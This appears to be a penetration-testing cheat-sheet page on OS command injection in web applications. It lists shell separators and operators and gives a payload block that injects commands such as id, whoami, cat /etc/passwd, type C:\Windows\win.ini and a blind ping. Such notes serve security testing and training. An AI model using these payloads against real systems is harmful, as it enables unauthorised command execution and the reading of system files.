# Command injection

Command injection occurs when flaws in a web application allow the execution of OS commands. This typically occurs because inputs are not properly sanitized, allowing attackers to change or add to executed commands.

* To identify potential command injection vulnerabilities, pay particular attention to functionality within web applications that is normally performed by OS commands
* Use command line symbols in input fields to test for command injection
  * ; (used to separate commands in Bash)
  * \| 
  * || (second command runs if first fails)
  * & 
  * && (second command runs if first succeeds)
  * \> 
  * \>>
* Be sure to use commands specific to the target OS
  * cat vs. type
  * ping vs. ping -c
  * ls vs. dir

#### Payloads

```
command; id
command && whoami
command || ls (or dir depending on OS)
command; cat /etc/passwd 
command; type C:\Windows\win.ini
Blind
command; ping -c5 $ipaddress
```